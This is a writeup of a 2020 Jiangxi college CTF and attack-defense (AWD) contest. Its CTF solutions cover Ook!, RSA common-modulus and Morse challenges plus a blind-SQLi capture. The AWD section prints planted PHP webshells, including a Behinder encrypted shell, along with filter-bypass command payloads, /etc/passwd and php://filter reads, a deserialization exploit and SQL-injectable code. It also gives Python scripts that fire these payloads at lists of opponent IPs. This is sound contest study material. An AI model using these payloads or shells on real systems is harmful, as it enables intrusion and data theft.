2020 3rd Jiangxi Provincial College Cyber Security Skills Competition, On-site Final: CTF & AWD Writeup
Contents
- CTF
  - Misc
    - Boring_exe
    - !_
    - ezAffine
    - Daylight
    - Blue
  - Web
    - Aurora website
    - web2 (forgot the name)
  - Crypto
    - EasyRSA
    - Interceptedtelegram
- AWD
  - AWD1
  - AWD2
CTF
Misc
Boring_exe
!_
..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.
Ook! cipher
Ook! online decoder: https://tool.bugku.com/brainfuck/
flag{Ookisok}
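As an added example (not part of the original writeup), a short-Ook interpreter in Python that decodes the challenge program above offline instead of relying on the online tool. It assumes the standard Ook!-to-brainfuck mapping, with `.`, `!` and `?` standing for `Ook.`, `Ook!` and `Ook?`.

```python
# Added example: decode the "!_" challenge locally. In short Ook, "." "!" "?"
# stand for "Ook." "Ook!" "Ook?", and every PAIR of symbols is one brainfuck
# instruction (whitespace is ignored).
PAIRS = {"..": "+", "!!": "-", ".?": ">", "?.": "<",
         "!.": ".", ".!": ",", "!?": "[", "?!": "]"}

# The challenge program, copied verbatim from the writeup.
CHALLENGE = """
..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.
"""

def to_brainfuck(short_ook):
    """Translate short Ook into brainfuck; rejects an odd symbol count."""
    syms = [c for c in short_ook if c in ".!?"]
    if len(syms) % 2:
        raise ValueError("odd number of Ook symbols")
    return "".join(PAIRS[a + b] for a, b in zip(syms[::2], syms[1::2]))

def run_brainfuck(code, stdin=b""):
    """Minimal brainfuck VM with 8-bit wrapping cells; returns the output."""
    jump, stack = {}, []
    for i, c in enumerate(code):        # precompute matching bracket pairs
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()             # IndexError on a stray "]"
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets")
    tape, ptr, pc, out, inp = [0] * 30000, 0, 0, bytearray(), list(stdin)
    while pc < len(code):
        c = code[pc]
        if c == "+":   tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-": tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ">": ptr += 1
        elif c == "<": ptr -= 1
        elif c == ".": out.append(tape[ptr])
        elif c == ",": tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0: pc = jump[pc]
        elif c == "]" and tape[ptr] != 0: pc = jump[pc]
        pc += 1
    return out.decode("latin-1")

def decode_ook(short_ook):
    """Short Ook text in, program output out."""
    return run_brainfuck(to_brainfuck(short_ook))
```

Calling decode_ook(CHALLENGE) yields the flag.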
ezAffine
Daylight
Thanks to team WAXZ of Jiangxi Normal University for providing the writeup for this challenge.
# Python 3 (the original script was Python 2)
import gmpy2
from Crypto.Util.number import long_to_bytes

n = 24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1 = 7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2 = 22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1 = 35
e2 = 42

# e1 and e2 share the factor 7 (35 = 7*5, 42 = 7*6), so the common-modulus
# attack with the reduced exponents yields m^7, and the 7th root is taken below
e1 = e1 // 7
e2 = e2 // 7

def exgcd(a, b):
    """Extended Euclid: returns (d, x, y) with a*x + b*y = d = gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    d, x, y = exgcd(b, a % b)
    return d, y, x - (a // b) * y

d, s1, s2 = exgcd(e1, e2)          # 5*s1 + 6*s2 = 1
# gmpy2.powmod accepts a negative exponent and inverts the base modulo n
m = (gmpy2.powmod(c1, s1, n) * gmpy2.powmod(c2, s2, n)) % n   # this is m^7 mod n

# if m^7 is larger than n, add multiples of n until an exact 7th root exists
root, exact = gmpy2.iroot(m, 7)
while not exact:
    m = m + n
    root, exact = gmpy2.iroot(m, 7)
print(long_to_bytes(root))
flag{1_0nly_see_d4ylight_d4ylight}
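The script above handles the one case e1 = 35, e2 = 42 with gmpy2. As an added example (not part of the original writeup), the general common-modulus recovery is written out in pure Python 3.8+: it divides out g = gcd(e1, e2), combines the two ciphertexts with the extended-Euclid coefficients to obtain m^g mod n, and then tries m^g + k·n for an exact g-th root. The toy modulus built from two Mersenne primes is constructed for the demonstration and is not a secure key; the attack uses only the public modulus.

```python
import math

def exgcd(a, b):
    """Extended Euclid: returns (d, x, y) with a*x + b*y = d = gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    d, x, y = exgcd(b, a % b)
    return d, y, x - (a // b) * y

def iroot(x, k):
    """Integer k-th root by binary search: (r, exact) with r = floor(x**(1/k))."""
    lo, hi = 0, 1 << (x.bit_length() // k + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x

def common_modulus(n, c1, c2, e1, e2, max_k=1000):
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n) under one modulus n.
    Works when g = gcd(e1, e2) is small and m^g is below (or only slightly
    above) n; returns None if no exact g-th root turns up within max_k tries."""
    g = math.gcd(e1, e2)
    d, s1, s2 = exgcd(e1 // g, e2 // g)      # s1*(e1/g) + s2*(e2/g) = 1
    # Python 3.8+: pow() with a negative exponent inverts the base modulo n
    mg = pow(c1, s1, n) * pow(c2, s2, n) % n # this is m^g mod n, not m
    for k in range(max_k):                   # m^g may exceed n: m^g = mg + k*n
        r, exact = iroot(mg + k * n, g)
        if exact:
            return r
    return None

# Constructed toy modulus from two Mersenne primes (NOT a secure key). The
# attack needs only the shared public modulus; no private exponent exists here.
P, Q = (1 << 521) - 1, (1 << 607) - 1
N = P * Q

def demo():
    """Same exponents as Daylight (35 and 42, gcd 7) on the toy modulus."""
    m = int.from_bytes(b"flag{demo_message}", "big")   # short enough: m^7 < N
    c1, c2 = pow(m, 35, N), pow(m, 42, N)
    r = common_modulus(N, c1, c2, 35, 42)
    return r.to_bytes((r.bit_length() + 7) // 8, "big")
```

The loop over k only helps when m^g barely exceeds n; for a message several bytes too long the missing multiple k is astronomically large, which is why the flag-sized message in Daylight is what makes the root extraction work.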
Blue
binwalk analysis
foremost extraction
zip pseudo-encryption
This yields blindsql.pcapng.
The file name alone says this is a capture of a blind SQL injection, so just filter for HTTP packets.
The parameters are passed directly via GET, so the filter can be narrowed further:
http.request.method==GET
Blind SQLi analysis
From the requests you can see that the ASCII code of the first character of the flag field is 102:
>>> chr(102)
'f'
Continue in the same way for the remaining characters.
flag{Gre4t_j0B_ON_This_Blue_sh4rk}
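As an added example (not part of the original writeup), the manual step above can be automated over the decoded GET requests of such a capture: every `ascii(substr(...,pos,1))=N` probe is parsed, the probe whose response matched the "true" page is kept, and the leaked value is rebuilt position by position. The request lines and response sizes below are constructed samples; the length of the "true" response is assumed to be known from the baseline `id=1` page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample of (request URI, response body length) pairs, in the shape
# produced by exporting the "http.request.method == GET" packets of a capture.
# Here 1543 is the 'true' page length and 1200 the 'false' page length.
CAPTURE = [
    ("/index.php?id=1%20and%20ascii(substr((select%20flag%20from%20flag),1,1))=101", 1200),
    ("/index.php?id=1%20and%20ascii(substr((select%20flag%20from%20flag),1,1))=102", 1543),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),2,1))=107", 1200),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),2,1))=108", 1543),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),3,1))=96", 1200),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),3,1))=97", 1543),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),4,1))=102", 1200),
    ("/index.php?id=1+and+ascii(substr((select+flag+from+flag),5,1))=123", 1543),
    ("/style.css", 3001),   # unrelated request, must be ignored
]

# position and compared value of an equality probe: ...substr(<expr>,POS,1))=VAL
PROBE = re.compile(r"substr\(.*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)", re.I)

def reconstruct(capture, true_len):
    """Rebuild the string leaked through equality probes. Positions that never
    received a 'true' answer (e.g. the attacker stopped early) show as '?'."""
    found = {}
    for uri, length in capture:
        m = PROBE.search(unquote_plus(uri))      # decodes both %20 and '+'
        if m and length == true_len:
            pos, val = int(m.group(1)), int(m.group(2))
            found[pos] = chr(val)
    if not found:
        return ""
    return "".join(found.get(i, "?") for i in range(1, max(found) + 1))
```

With binary-search style probes (`>` instead of `=`, as sqlmap sends) the same parsing applies but the per-position value has to be narrowed from the sequence of true/false answers rather than read off a single match.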
Web
Aurora website
Upload an image and change the Content-Type. The hint indicates a race condition, so use Burp Intruder to keep sending the request.
web2 (forgot the name)
Thanks to team Stalker of Jiangxi University of Science and Technology for the approach.
Crypto
EasyRSA
flag{We1c0meCtf3r_elab}
Interceptedtelegram
Morse code
.- -.-. - .. ----- -. --.- ..- .. -.-. -.-
Morse code online decoder: http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx
flag{ACTI0NQUICK}
AWD
AWD1
awd1
├── about.php
├── admin
│ ├── footer.php
│ ├── header.php
│ ├── index.php
│ ├── logout.php
│ ├── upload
│ │ ├── 1596596144.png
│ │ ├── 1600179756.php
│ │ ├── 1600180813.exe
│ │ └── .library.php
│ └── upload.php
├── config.php
├── contact.php
├── css
│ ├── bootstrap.css
│ ├── chocolat.css
│ ├── flexslider.css
│ └── style.css
├── data
│ ├── flot-data.js
│ └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│ ├── 10.jpg
│ ├── 11.jpg
│ ├── 12.jpg
│ ├── 13.jpg
│ ├── 14.jpg
│ ├── 15.jpg
│ ├── 16.jpg
│ ├── 17.jpg
│ ├── 1.jpg
│ ├── 1.png
│ ├── 2.jpg
│ ├── 2.png
│ ├── 3.jpg
│ ├── 3.png
│ ├── 4.jpg
│ ├── 4.png
│ ├── 5.jpg
│ ├── 5.png
│ ├── 6.jpg
│ ├── 7.jpg
│ ├── 8.jpg
│ ├── 9.jpg
│ ├── banner1.jpg
│ ├── banner.jpg
│ ├── close.png
│ ├── co.png
│ ├── img-sp.png
│ ├── left.png
│ └── right.png
├── index.php
├── js
│ ├── bootstrap.js
│ ├── jquery-1.11.1.min.js
│ ├── jquery.chocolat.js
│ ├── jquery.flexslider.js
│ └── sb-admin-2.js
├── less
│ ├── mixins.less
│ ├── sb-admin-2.less
│ └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
    ├── askgreen.png
    ├── errorred.png
    ├── google_jquery.min.js
    ├── google_jquery-ui.min.js
    ├── JQuery.cookie.js
    ├── jquery.pagination.js
    ├── jquery.ui.all.css
    ├── loading1.gif
    ├── loadingpn.gif
    ├── login_bgx.gif
    ├── login.js
    ├── login_m_bg.png
    ├── logo.png
    ├── okgreen.png
    ├── pagination.css
    ├── site_bg.png
    ├── style.css
    ├── style_log.css
    ├── userpanel.css
    └── webtemples.js

8 directories, 85 files
Exploitation point 1
Backdoor file: awd1/.shell.php
<?php
$key = $_POST["cmd"];
if(isset($key)){
    $key = str_replace("flag","",$key);
}
eval($key);
?>
It only strips the string flag, so there are plenty of ways around it:
cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........
import requests

def post_shell(ip_list):
    flag_path = '/.shell.php'   # path of the backdoor
    post_data = 'cmd=system("cat /flflagag.txt");'
    for i in ip_list:
        header_info = {
            'Host': i,
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate',
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        flag_url = 'http://' + i + flag_path
        res = requests.post(url=flag_url, data=post_data, headers=header_info)
        print("[+]{0}: {1}\n".format(i, res.text))

if __name__ == '__main__':
    ip_list = ['172.20.102.101', '172.20.103.101', '172.20.104.101', '172.20.105.101',
               '172.20.106.101', '172.20.107.101', '172.20.108.101', '172.20.109.101',
               '172.20.110.101', '172.20.111.101', '172.20.112.101']
    post_shell(ip_list)
Exploitation point 2
Arbitrary file read: awd1/about.php
<?php
$file=$_GET['file'];
$file = str_replace("flag","",$file);
$file = str_replace("../","",$file);
$file = str_replace("..","",$file);
$file = str_replace("file://","",$file);
@print_r(file_get_contents($file));
?>
Read the flag by absolute path through the file:// wrapper; in an AWD environment the absolute path of the flag is known: /flag.txt
?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......
Exploitation point 3
Code execution: awd1/config.php
// web root
$basedir = '';
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
    exit();
}
@eval($shell);
Bypass the keyword filter on the parameter to get code execution:
shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');
Exploitation point 4
Arbitrary file read: awd1/concat.php
<?php
include 'header.php';
$file_path = @$_GET['path'];
if(file_exists($file_path)){
    $fp = fopen($file_path,"r");
    $str = fread($fp,filesize($file_path));
    echo $str = str_replace("\r\n","<br />",$str);
}
?>
?path=/flag.txt
?path=/etc/passwd
Exploitation point 5
Command execution with a filter bypass on the parameter: awd1/footer.php
<?php
$shell=@$_POST['shell'];
if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
    exit();
}else{
    @system($shell);
}
?>
shell=ca''t</fl''ag.txt
shell=`echo${IFS}Y2F0IC9mbGFnLnR4dAo=|base64${IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt
Exploitation point 6
SQL injection: awd1/login.php
<?php
include_once('config.php');
if (!empty($_POST['username'])) {
    $user=$_POST['username'];
    $pass=$_POST['password'];
    $query = "SELECT * FROM admin WHERE user_name='{$user}' and user_pass='{$pass}' ";
    $data = mysqli_query($dbc,$query);
    if (mysqli_num_rows($data) == 1) {
        $row = mysqli_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        header('Location: ./admin/index.php');
    }else{
        echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
    }
}
?>
Exploitation point 7
SQL injection: awd1/search.php
<?php
include 'header.php';
include_once('config.php');
$id=$_GET['id'];
$check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
if($check){
    echo "Invalid strings!!!Please try agine!";
}else{
    $query = "SELECT * FROM news WHERE id=$id";
    $data = mysqli_query($dbc,$query);
    $com = mysqli_fetch_array($data);
}
?>
The eregi() check can be truncated with %00, after which the injection goes through.
ereg() and eregi() were dropped in PHP 7; my container environment here is PHP 7.3, and testing returns a fatal error.
Didn't bother testing further…
Exploitation point 8
Deserialization to code execution: awd1/ser.php
<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new safe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class safe
{
    function action() {
        echo "Here is safe";
    }
}
class unsafe
{
    private $data;
    function action() {
        eval($this->data);
    }
}
unserialize(@$_GET['test']);
Build the POC directly:
<?php
class Smi1e
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new unsafe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class unsafe
{
    private $data="system('cat /flag.txt');";
    function action() {
        eval($this->data);
    }
}
$res = new Smi1e();
echo urlencode(serialize($res));
?>
?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D
PS: a gripe about the class name Smi1e the challenge author chose; I kept reading Smi1e as Smile……
Exploitation point 9
Command execution: awd1/admin/footer.php
<?php
$shell=@$_POST['shell'];
@system($shell);
if($shell !=""){
    exit();
}
?>
shell=cat /flag.txt
Exploitation point 10
Flag handed out directly: awd1/admin/index.php
<!-- banner -->
<div class="banner1"></div>
<!-- //banner -->
<!-- single -->
<div class="single">
    <div class="container">
        <div class="single-page-artical">
            <div class="artical-content">
                <h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
                <img class="img-responsive" src="../images/banner.jpg" alt=" " />
                <p></p>
            </div>
However, as I recall, during the competition the flag's path and file name was /flag.txt, so this code could not read it during the competition. Change it to /flag.txt and the flag is read.
Exploitation point 11
Arbitrary file upload: awd1/admin/upload.php
<html lang="zh-CN"><head><meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
    include_once('header.php');
    $html_username = htmlspecialchars($_SESSION['username']);
    if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
        echo $_SESSION['error_info'];
        $_SESSION['error_info'] = '';
    }
}
else {
    header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    if($name!==""){
        $name1=substr($name,-4);
        if(is_uploaded_file($tmpName)){
            $time=time();
            $rootpath='./upload/'.$time.$name1;
            $file=fopen($tmpName, "r") or die('No such file!');
            $content=fread($file, filesize($tmpName));
            if(strstr($content,'fuck')){
                exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
            }
            if(!move_uploaded_file($tmpName,$rootpath)){
                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
                exit;
            }
        }
        echo "上传成功:/upload/".$time.$name1;
    }
}
catch(Exception $e)
{
    echo "ERROR";
}
//
require('footer.php');?></html>
The challenge itself ships a command-execution backdoor at awd1/admin/upload/1600179756.php:
//1600179756.php
<?php system($_GET['cmd']);?>
Exploitation point 12
Behinder (冰蝎) webshell: awd1/admin/upload/.library.php
<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        for($i=0;$i<strlen($post);$i++) {
            $post[$i] = $post[$i]^$key[$i+1&15];
        }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);
}
?>
Behinder (冰蝎) webshell: https://www.t00ls.net/articles-56337.html
PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=
AWD2
Exploitation point 1
File read that hands out the flag directly: ecshop/a.php
<?php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));
}
?>
PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"
import requests

def get_shell(ip_list):
    flag_path = '/a.php'
    pwd = 'shop'
    command = 'test'
    for i in ip_list:
        flag_url = 'http://' + i + flag_path + '/?' + pwd + '=' + command
        res = requests.get(url=flag_url)
        print("[+]{0}: {1}\n".format(i, res.text))

if __name__ == '__main__':
    ip_list = ['172.20.102.102', '172.20.103.102', '172.20.104.102', '172.20.105.102',
               '172.20.106.102', '172.20.107.102', '172.20.108.102', '172.20.109.102',
               '172.20.110.102', '172.20.111.102', '172.20.112.102']
    get_shell(ip_list)
Exploitation point 2
Command execution: ecshop/api.php
$hook = $_GET['s'];
if(isset($hook)){
    echo `$hook`;
}
?s=cat /flag.txt
Exploitation point 3
File read that hands out the flag directly: ecshop/check_file.php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('L2ZsYWcudHh0'));
}
Exploitation point 4
File read that hands out the flag: ecshop/config.php
f(isset($_GET['shop'])){echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){
    echo file_get_contents(base64_decode('ZmxhZy50eHQ='));
}
?>
But here the path of flag.txt is wrong, so it cannot be read:
PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"